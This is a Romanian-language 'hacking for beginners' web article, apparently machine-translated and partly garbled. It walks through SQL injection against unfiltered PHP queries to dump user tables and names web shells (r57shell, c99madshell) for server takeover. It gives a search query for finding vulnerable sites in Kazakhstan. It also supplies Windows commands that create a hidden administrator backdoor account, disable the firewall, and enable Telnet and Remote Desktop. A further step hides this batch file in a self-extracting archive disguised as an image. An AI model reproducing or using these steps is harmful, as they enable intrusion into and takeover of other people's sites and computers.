Metode de hacking
[Hacking pentru incepatori]
$ id = $ _REQUEST ['id'];
$ res = mysql_query ("SELECT * FROM news WHERE id_news = $ id");
Dacă nu este filtrat, atunci va exista o eroare:
(Avertisment: mysql (): argumentul furnizat nu este valabil Resursa de rezultate MySQL in)
Apoi, calculați câmpurile din tabel folosind clauza ORDER BY
Să presupunem că 7 dintre acestea 3 sunt afișate pe site.
Sunt afișate câmpurile 3, 5. Învățăm versiunea bazei de date MySQL folosind versiunea ()
O versiune a bazei de date va fi scrisă pe site-ul din câmpul 3. Să presupunem că aceasta este o versiune 5.
În toate versiunile de mai sus, există tabele universale INFORMATION_SCHEMA.TABLES și câmpul TABLE_NAME.
INFORMATION_SCHEMA.COLUMNS și COLUMN_NAME
Acum, în caseta a 3-a, toate tabelele din baza de date vor fi afișate.
Toate coloanele sunt în tabele.
Mai mult, găsim tabelul, de exemplu, utilizatorii și un câmp, de exemplu, nume_proprietar, utilizator_pass, user_email, user_mobile, user_address
Având acces la site, administratorul poate folosi o vulnerabilitate ca PHP - injecție
Acest lucru este de a umple în serverul shell (script PHP special care oferă acces deplin la server și de găzduire, în general, Toe este, în cazul în care serverul nu găsește un singur site și 50 -. 100, atunci acesta poate fi folosit pentru a avea acces la editarea toate site-urile și gestionarea sistemului de operare pentru servere ) de exemplu r57shell sau c99madshell.
Pentru a găsi o astfel de vulnerabilitate pe site-uri nu este dificilă, trebuie doar să introduceți în google.com
cerere: inurl: news.php? id = 5 site: kz Atenție: mysql
La cerere, vor exista numeroase situri vulnerabile situate în Kazahstan.
Hacking computerul.
Există atât de multe moduri, dar voi vorbi despre universală, cu care puteți obține acces deplin la computer până când vă conectați la desktop.
chcp 1251
utilizator net coolz 12333 / add
net Administratorii grupului local coolz / add
net Administratorii grupului local coolz / add
net stop sharedaccess
sc config tlntsvr start = auto
Portul de configurare tlntadmn = 972 sec = -NTLM
net start Telnet
Creează un utilizator separat în sistemul Coolz și stabilește parola la 12333
Apoi, atribuiți drepturi de administrator. Iar portul 972 se deschide.
Apoi alegeți fișierul pe care doriți să îl "vparit" lăsați să fie o imagine 1.jpg
Cale =% WinDir% temp
SavePath
Setup = cool.bat
Setup = 1.exe
Silent = 1
Toată arhiva deghizată cu bateria este gata
Adică, după ce arhiva este deschisă, fișierul bat este executat, apoi imaginea se deschide
După conectarea la un computer, puteți accesa gestionarea de la distanță
Pentru aceasta, introduceți următorii parametri pe linia de comandă:
chcp 1251
net localgroup Utilizatori de la distanță Desktop coolz / add
conturi net / maxpwage: nelimitat
REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" / v "Coolz" / t REG_DWORD / d 0 / f
net stop sharedaccess
sc config sharedaccess start = dezactivat
sc config tlntsvr start = auto
Îți voi spune despre ruperea cutiei în scurt timp.
Există 3 moduri de hacking:
Căutarea parolei în funcție de dicționar
A doua utilizare a vulnerabilității XSS
A treia inginerie socială
Articole similare
Trimiteți-le prietenilor: